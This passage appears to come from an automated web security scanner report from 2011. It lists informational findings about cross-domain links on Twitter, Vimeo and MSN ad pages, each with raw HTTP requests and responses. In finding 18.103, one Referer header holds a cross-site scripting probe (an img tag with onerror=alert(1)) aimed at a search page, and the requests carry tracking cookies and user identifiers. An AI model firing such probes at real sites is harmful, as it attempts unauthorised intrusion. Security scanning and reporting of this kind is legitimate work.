\"B7F23440-C8B5-4684-BE17-08EC59EEAB9A\"+ 78882+ 35675+ 575]+ \"690770\": [1309951300+ \"ThRFQQAEG8YK5TlPHdsIpA==\"+ 63083+ 25140+ 6119]+ \"584205\": [1309235459+ \"4153838206207653460\"+ 160819+ 103586+ 2]+ \"642979\": [1309224535+ \"2550584914158478617\"+ 162013+ 105345+ 2]+ \"609770\": [1308705126+ \"4234390b-dad8-3097-8291-83ad77634b5c\"+ 135488+ 76161+ 55]+ \"580191\": [1307361309+ \"6341833618359868224\"+ 29707+ 11561+ 12332]}"; camp_freq_p1="eJzjkuE4dJBNgFHizYMZH1kUGDVmfALSBowWYD6XDMfbiWwCnBLbobLLn88Fy26Hyq7/zyTAJNEOld38CKIXzOcS4bh9lQVo8pwNvz+wKDBoMBgwWDAARe8vZgPqOdJ1EUV04jJWoNrmTUtRRGfNALmtaS2q6NzHILXX7yxBEV0xHyT6rakVRXQN2IXP0ER7F4DMbTn79D2y6OuJINGDD6+jiE5+DzL3QsNmFNHfC0Gic9FE774E+XjGhwYU0Z1Al2VJfHqPLCrKMfMHi0Ars8Si06jCu76yCExklDi3/P87ZOFZQDOuMUpcefnvHbLRZ1+wCjBL7Ht6D0X04yuw43ZdQBGdtREkeuv7QYQoAEpukas="; io_freq_p1="eJzjEua4mCTAKPHmwYyPLAaMFmCaS5xjSbwAl8R2EEeBQYMBKLEdKvHDRoBVoh1JAszmEuY4mCDAJHGk6+IHiASDBQNQsC8MaHbzpqUogi/jgYJNa1EF70QABa/fWYIkKMKxLVTgIJPEt6ZWFKXLEoBKW84+fY8s+DgGKHihYTOK4IVQoOBcNMGnAUDBGR8a3iPb9CNQoJVZYtFpVNFbgQITGSXOLf//DtmAzTECzBL7nt5DETwKsn/urgsogt3hQMFb3w8iBAHPUWOk"; dp_rec="{\"1\": 1308705141+ \"3\": 1308705126+ \"2\": 1311125618+ \"4\": 1305981633}"; segments_p1="eJwdUctKAmEYxWYW06zmUXqAHqF9QTt3LfIZ0jYpSaC1yG6YRRDldaCLJFTipcESKkqLIkijSGoMUhjTvnM2h8OZ7zvfmfPrqmZnFV3VljLAp55LsNIdEmzWgW9H0LthVbD1CiXUGNKHtajb2DlI2qquaPseUS3Z0bXBgmpcny62MV2UaUXrjwsNFrFo0nCzByzw0GoLmD6BstaDbcxtHNNWRjqQt724/+mA17hk1qD45xRxL2sCRajtS6j33Nm9Ar/gH5WDUErM4p0QSHokZz6lGPFopIM7oSYmKpyLhOFV5n9a7+D2NzDnANdtcrZzyBQ+3jAHUB55e5lff9PQPxxcHYwJnWdpz5PGmq/A0qKjop7TMMleqly3GKNWxfpNAl8thoneAd9ZwwMntxgpH8Bk5w88xmZn+y6xf5tGxjjklwfI6+zkNg2lxNSzA6RLaUiXgTxD+YtFmnRP2byaAzYyfA7qoSzwh6WujOCB2WGQBq0N8D0HMWKG0DrzBjIQAlNCE1WsR87wgn3cf/Ir/6ZVti0="; partnerUID=eyIxMTUiOiBbIjRkY2U4YTUzMDUwOGIwMmQiLCB0cnVlXSwgIjE5MSI6IFsiODQ5NjUzMDYzOTI1MzI1NTgwNiIsIHRydWVdLCAiMTUiOiBbIjAwNDAwMzAwMTQwMDAwMDQ0OTg3MiIsIHRydWVdLCAiODQiOiBbIkZ6NitFUy9jOTlPNno1T0IiLCB0cnVlXSwgIjExMyI6IFsiRlFXV0MyVksyRFdGIiwgdHJ1ZV19

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 23 Jul 2011 13:48:45 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Sat, 23-Jul-2011 13:48:25 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 1042

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=300&external_user_id=09035c0c-59c0-487e-ac6a-85a606e2b1c1&Expiration=1311860925&custom_user_segments=%2C11265%2C50185%2C32345%2C48153%2C6171%2C48669%2C7713%2C48674%2C48675%2C26671%2C1073%2C32180%2C48190%2C32326%2C45639%2C45640%2C45641%2C48203%2C48205%2C59481%2C32350%2C45677%2C30833%2C45683%2C1150%2C9855%2C13450%2C45708%2C45714%2C30364%2C30878%2C49317%2C47281%2C40626%2C60596%2C60600%2C30915%2C55492%2C55670%2C199%2C34505%2C34507%2C34509%2C2083%2C50398%2C56551%2C32503%2C32515%2C45837%2C45842%2C57626%2C12577%2C12579%2C14125%2C44336%2C44340%2C22328%2C50500%2C55693%2C22869%2C14128%2C44390%2C40809%2C14055%2C59247%2C59250%2C29899%2C55680%2C55682%2C49027%2C22922%2C22924%2C41869%2C23954%2C55701%2C18842%2C59294%2C43937%2C32164%2C32165%2C59306%2C32172%2C49076%2C1097%2C32190%2C45643%2C48070%2C55752%2C55754%2C48080%2C22484%2C48088%2C48090%2C48091%2C48092%2C11743%2C44513%2C39397%2C48617%2C48618%2C48620%2C36845%2C56817%2C68088%2C11262%2C67583"/>');

18.96. http://platform0.twitter.com/widgets/follow_button.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://platform0.twitter.com
Path:	/widgets/follow_button.html

Issue detail

The page was loaded from a URL containing a query string:

http://platform0.twitter.com/widgets/follow_button.html?_=1311427152706&align=right&button=grey&id=twitter_tweet_button_0&lang=en&link_color=%2374b31f&screen_name=treehugger&show_count=false&show_screen_name=&text_color=%23FFFFFF

The response contains the following link to another domain:

http://microformats.org/profile/hcard

Request

GET /widgets/follow_button.html?_=1311427152706&align=right&button=grey&id=twitter_tweet_button_0&lang=en&link_color=%2374b31f&screen_name=treehugger&show_count=false&show_screen_name=&text_color=%23FFFFFF HTTP/1.1
Host: platform0.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A130884465537011414; k=173.193.214.243.1311018175028268; __utma=43838368.1598605414.1305368954.1311089296.1311168412.19; __utmz=43838368.1311168412.19.12.utmcsr=coupon.excite.co.jp|utmccn=(referral)|utmcmd=referral|utmcct=/campaign/drink2011/; __utmv=43838368.lang%3A%20en

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 21 Jul 2011 20:33:57 GMT
ETag: "193c5370c524d3b36c517f910180e418"
Accept-Ranges: bytes
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Length: 31381
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
Date: Sat, 23 Jul 2011 13:19:06 GMT
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<!DOCTYPE html><html><head><title>Twitter For Websites: Follow Button</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><link rel="profile" href="http://microformats.org/profile/hcard"><style type="text/css">
...[SNIP]...

18.97. http://player.vimeo.com/video/18305022 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://player.vimeo.com
Path:	/video/18305022

Issue detail

The page was loaded from a URL containing a query string:

http://player.vimeo.com/video/18305022?title=0&byline=0&portrait=0

The response contains the following links to other domains:

http://a.vimeocdn.com/p/1.3.3/css/player.core.opt.css?d512f
http://a.vimeocdn.com/p/1.3.3/js/player.core.opt.js?d512f

Request

GET /video/18305022?title=0&byline=0&portrait=0 HTTP/1.1
Host: player.vimeo.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/travel_nature/?campaign=th_nav_travel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=256147786.1335440020.1308435968.1311347844.1311368393.4; __utmz=256147786.1311368393.4.4.utmcsr=keepitfresh.frid.ge|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:19:45 GMT
Server: Apache
X-Powered-By: PHP/5.3.5-0.dotdeb.0
X-Server: 10.90.128.118
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Expires: Fri, 25 Feb 1983 09:30:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 8526
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Growing is Forever</title><!--[if lt IE 9]><style>.a.d .ab {display: block;}.a.d .bh {background: #000;filter: alpha(opacity='70');}</
...[SNIP]...
</style><link rel="stylesheet" href="http://a.vimeocdn.com/p/1.3.3/css/player.core.opt.css?d512f"><script src="http://a.vimeocdn.com/p/1.3.3/js/player.core.opt.js?d512f"></script>
...[SNIP]...

18.98. http://player.vimeo.com/video/25752549 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://player.vimeo.com
Path:	/video/25752549

Issue detail

The page was loaded from a URL containing a query string:

http://player.vimeo.com/video/25752549?title=0&byline=0&portrait=0

The response contains the following links to other domains:

http://a.vimeocdn.com/p/1.3.3/css/player.core.opt.css?d512f
http://a.vimeocdn.com/p/1.3.3/js/player.core.opt.js?d512f

Request

GET /video/25752549?title=0&byline=0&portrait=0 HTTP/1.1
Host: player.vimeo.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/science_technology/?campaign=th_nav_scitech
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=256147786.1335440020.1308435968.1311368393.1311427208.5; __utmb=256147786.1.10.1311427208; __utmc=256147786; __utmz=256147786.1311427208.5.5.utmcsr=treehugger.com|utmccn=(referral)|utmcmd=referral|utmcct=/travel_nature/

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:43:27 GMT
Server: Apache
X-Powered-By: PHP/5.3.5-0.dotdeb.0
X-Server: 10.90.128.115
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Expires: Fri, 25 Feb 1983 09:30:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 7840
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>BIKE GUIDE</title><!--[if lt IE 9]><style>.a.d .ab {display: block;}.a.d .bh {background: #000;filter: alpha(opacity='70');}</style><!
...[SNIP]...
</style><link rel="stylesheet" href="http://a.vimeocdn.com/p/1.3.3/css/player.core.opt.css?d512f"><script src="http://a.vimeocdn.com/p/1.3.3/js/player.core.opt.js?d512f"></script>
...[SNIP]...

18.99. http://player.vimeo.com/video/26341323 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://player.vimeo.com
Path:	/video/26341323

Issue detail

The page was loaded from a URL containing a query string:

http://player.vimeo.com/video/26341323?title=0&byline=0&portrait=0&color=ffffff

The response contains the following links to other domains:

http://a.vimeocdn.com/p/1.3.3/css/player.core.opt.css?8d378
http://a.vimeocdn.com/p/1.3.3/js/player.core.opt.js?8d378

Request

GET /video/26341323?title=0&byline=0&portrait=0&color=ffffff HTTP/1.1
Host: player.vimeo.com
Proxy-Connection: keep-alive
Referer: http://keepitfresh.frid.ge/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=256147786.1335440020.1308435968.1308533399.1311347844.3; __utmz=256147786.1311347844.3.3.utmcsr=patterninsight.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:59:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.5-0.dotdeb.0
X-Server: 10.90.128.118
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Expires: Fri, 25 Feb 1983 09:30:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 7791
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Nosh: Three Dinners</title><!--[if lt IE 9]><style>.a.d .ab {display: block;}.a.d .bh {background: #000;filter: alpha(opacity='70');}<
...[SNIP]...
</style><link rel="stylesheet" href="http://a.vimeocdn.com/p/1.3.3/css/player.core.opt.css?8d378"><script src="http://a.vimeocdn.com/p/1.3.3/js/player.core.opt.js?8d378"></script>
...[SNIP]...

18.100. http://player.vimeo.com/video/8022406 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://player.vimeo.com
Path:	/video/8022406

Issue detail

The page was loaded from a URL containing a query string:

http://player.vimeo.com/video/8022406?title=0&byline=0&portrait=0

The response contains the following links to other domains:

http://a.vimeocdn.com/p/1.3.3/css/player.core.opt.css?d512f
http://a.vimeocdn.com/p/1.3.3/js/player.core.opt.js?d512f

Request

GET /video/8022406?title=0&byline=0&portrait=0 HTTP/1.1
Host: player.vimeo.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/science_technology/?campaign=th_nav_scitech
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=256147786.1335440020.1308435968.1311368393.1311427208.5; __utmb=256147786.1.10.1311427208; __utmc=256147786; __utmz=256147786.1311427208.5.5.utmcsr=treehugger.com|utmccn=(referral)|utmcmd=referral|utmcct=/travel_nature/

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:43:27 GMT
Server: Apache
X-Powered-By: PHP/5.3.5-0.dotdeb.0
X-Server: 10.90.128.115
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Expires: Fri, 25 Feb 1983 09:30:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 8381
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>The Ballad of Marshall Mcluhan</title><!--[if lt IE 9]><style>.a.d .ab {display: block;}.a.d .bh {background: #000;filter: alpha(opaci
...[SNIP]...
</style><link rel="stylesheet" href="http://a.vimeocdn.com/p/1.3.3/css/player.core.opt.css?d512f"><script src="http://a.vimeocdn.com/p/1.3.3/js/player.core.opt.js?d512f"></script>
...[SNIP]...

18.101. http://rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&PG=CMS3DF&AP=1089

The response contains the following link to another domain:

http://ads2.msads.net/CIS/84/000/000/000/015/591.gif

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PG=CMS3DF&AP=1089 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=e9b0b7965c774fdb94f4dbbf73989380; CULTURE=EN-US; v1st=D4335FAB02FF2C98; ATC_ID=173.193.214.243.1307039206918742; VWCUKP300=L123100/Q72318_13861_1563_060211_1_060311_443106x442830x060211x1x1/Q73186_13384_1473_060111_1_061517_449169x449165x060111x1x1; __qca=P0-1267859454-1307060745444; MSNMOBREP=dcecbf9971484c8dbc4017eb007d89c3; __switchTo5x=94; __unam=7a54b75-130adfe6f89-5d6f1b4f-2; MSNTVID=e9b0b7965c774fdb94f4dbbf73989380; mh=LENOVO; SRCHHPGUSR=AS=1; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; MUID=E361C23374E642C998D8ABA7166A75EC; Sample=93; CC=US; expid=id=865ab549f40144759b93e2b7bb61b392&bd=2011-07-20T01:30:56.273&v=2

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 845
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8892372-T20670707-C72000000000041904
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Sat, 23 Jul 2011 02:07:55 GMT
Content-Length: 845

//<![CDATA[
function getRADIds() { return{"adid":"72000000000041904","pid":"8892372","targetid":"20670707"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);}

...[SNIP]...
<a href="http://g.msn.com/2AD0004H/72000000000041904.1??PID=8892372&UIT=G&TargetID=20670707&AN=34294019&PG=CMS3DF&ASID=6a7a9425dce349a59026d34ce292d26f" target="_blank"><img src="http://ads2.msads.net/CIS/84/000/000/000/015/591.gif" width="300" height="250" alt="Ad - LearnDevNow" border="0" /></a>
...[SNIP]...

18.102. http://rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&ID=E361C23374E642C998D8ABA7166A75EC&MUID=E361C23374E642C998D8ABA7166A75EC&PG=CMSHPA&AP=1390

The response contains the following links to other domains:

http://clk.atdmt.com/MRT/go/328728151/direct;;wi.728;hi.90/01/
http://view.atdmt.com/MRT/iview/328728151/direct;;wi.728;hi.90/01?click=
http://view.atdmt.com/MRT/view/328728151/direct;;wi.728;hi.90/01/

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&ID=E361C23374E642C998D8ABA7166A75EC&MUID=E361C23374E642C998D8ABA7166A75EC&PG=CMSHPA&AP=1390 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=e9b0b7965c774fdb94f4dbbf73989380; CULTURE=EN-US; v1st=D4335FAB02FF2C98; ATC_ID=173.193.214.243.1307039206918742; VWCUKP300=L123100/Q72318_13861_1563_060211_1_060311_443106x442830x060211x1x1/Q73186_13384_1473_060111_1_061517_449169x449165x060111x1x1; __qca=P0-1267859454-1307060745444; MSNMOBREP=dcecbf9971484c8dbc4017eb007d89c3; __switchTo5x=94; __unam=7a54b75-130adfe6f89-5d6f1b4f-2; MSNTVID=e9b0b7965c774fdb94f4dbbf73989380; mh=LENOVO; SRCHHPGUSR=AS=1; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; CC=US; expid=id=865ab549f40144759b93e2b7bb61b392&bd=2011-07-20T01:30:56.273&v=2; MUID=E361C23374E642C998D8ABA7166A75EC; Sample=93

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2401
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8970946-T38644085-C54000000000043332
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Thu, 21 Jul 2011 20:05:08 GMT
Content-Length: 2401

//<![CDATA[
function getRADIds() { return{"adid":"54000000000043332","pid":"8970946","targetid":"38644085"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 728, 90);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_404294099() {var adCode_404294099=new Array();adCode_404294099.push('<iframe src="http://view.atdmt.com/MRT/iview/328728151/direct;;wi.728;hi.90/01?click=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90">\n');adCode_404294099.push('<scr'+'ipt language="JavaScript" type="text/javascript">\n');adCode_404294099.push('document.write(\'<a href="http://clk.atdmt.com/MRT/go/328728151/direct;;wi.728;hi.90/01/" target="_blank"><img src="http://view.atdmt.com/MRT/view/328728151/direct;;wi.728;hi.90/01/"/></a>
...[SNIP]...

18.103. http://rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&ID=1FDD375D440B439987A467BECD35D2C6&MUID=1FDD375D440B439987A467BECD35D2C6&PG=CMS3TL&AP=1390

The response contains the following links to other domains:

http://clk.atdmt.com/MRT/go/328725800/direct;;wi.728;hi.90/01/
http://view.atdmt.com/MRT/iview/328725800/direct;;wi.728;hi.90/01?click=
http://view.atdmt.com/MRT/view/328725800/direct;;wi.728;hi.90/01/

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&ID=1FDD375D440B439987A467BECD35D2C6&MUID=1FDD375D440B439987A467BECD35D2C6&PG=CMS3TL&AP=1390 HTTP/1.1
Host: rad.msn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://social.msdn.microsoft.com/Search/en-US?query=84e17%3Cimg%2520src%253da%2520onerror%253dalert(1)%3E8704c19d382%3D1&Refinement=123&ac=8
Cookie: MC1=V=3&GUID=af7f3bc9414d4d7f98f7762d0ecd4c67; CULTURE=EN-US; MSNRPSShare=1; MUID=1FDD375D440B439987A467BECD35D2C6

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2401
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8809150-T20670737-C66000000000052218
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Sat, 23 Jul 2011 04:45:57 GMT
Content-Length: 2401

//<![CDATA[
function getRADIds() { return{"adid":"66000000000052218","pid":"8809150","targetid":"20670737"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 728, 90);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_573245512() {var adCode_573245512=new Array();adCode_573245512.push('<iframe src="http://view.atdmt.com/MRT/iview/328725800/direct;;wi.728;hi.90/01?click=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90">\n');adCode_573245512.push('<scr'+'ipt language="JavaScript" type="text/javascript">\n');adCode_573245512.push('document.write(\'<a href="http://clk.atdmt.com/MRT/go/328725800/direct;;wi.728;hi.90/01/" target="_blank"><img src="http://view.atdmt.com/MRT/view/328725800/direct;;wi.728;hi.90/01/"/></a>
...[SNIP]...

18.104. http://rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&ID=1FDD375D440B439987A467BECD35D2C6&MUID=1FDD375D440B439987A467BECD35D2C6&PG=CMSCGA&AP=1089

The response contains the following link to another domain:

http://ads2.msads.net/CIS/18/000/000/000/012/918.jpg

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&ID=1FDD375D440B439987A467BECD35D2C6&MUID=1FDD375D440B439987A467BECD35D2C6&PG=CMSCGA&AP=1089 HTTP/1.1
Host: rad.msn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://code.msdn.microsoft.com/
Cookie: MC1=V=3&GUID=af7f3bc9414d4d7f98f7762d0ecd4c67; CULTURE=EN-US; MSNRPSShare=1; MUID=1FDD375D440B439987A467BECD35D2C6

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 868
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8621006-T44387620-C49000000000044568
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Sat, 23 Jul 2011 04:46:52 GMT
Content-Length: 868

//<![CDATA[
function getRADIds() { return{"adid":"49000000000044568","pid":"8621006","targetid":"44387620"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);}

...[SNIP]...
<a href="http://g.msn.com/2AD00053/49000000000044568.1??PID=8621006&UIT=G&TargetID=44387620&AN=956893734&PG=CMSCGA&ASID=1eee8726bf114aafb43f8d699d350377" target="_blank"><img src="http://ads2.msads.net/CIS/18/000/000/000/012/918.jpg" width="300" height="250" alt="Microsoft Store: Hot Deal, Cool Stuff" border="0" /></a>
...[SNIP]...

18.105. http://rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&ID=3320E7738B0764152F29E55B8F07641E&MUID=3320E7738B0764152F29E55B8F07641E&PG=CMS3TL&AP=1390

The response contains the following link to another domain:

http://ads2.msads.net/CIS/3/000/000/000/016/847.gif

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&ID=3320E7738B0764152F29E55B8F07641E&MUID=3320E7738B0764152F29E55B8F07641E&PG=CMS3TL&AP=1390 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://social.msdn.microsoft.com/Search/en-US?query=xss&beta=0&ac=8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: rad.msn.com
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=66ef802b93654512ad8f2c9459d99579; mh=MSFT; CC=US; CULTURE=EN-US; Sample=37; MUID=3320E7738B0764152F29E55B8F07641E

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 834
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8750829-T34931985-C4000000000043978
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Sat, 23 Jul 2011 04:54:51 GMT
Content-Length: 834

//<![CDATA[
function getRADIds() { return{"adid":"4000000000043978","pid":"8750829","targetid":"34931985"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 728, 90);}
tr
...[SNIP]...
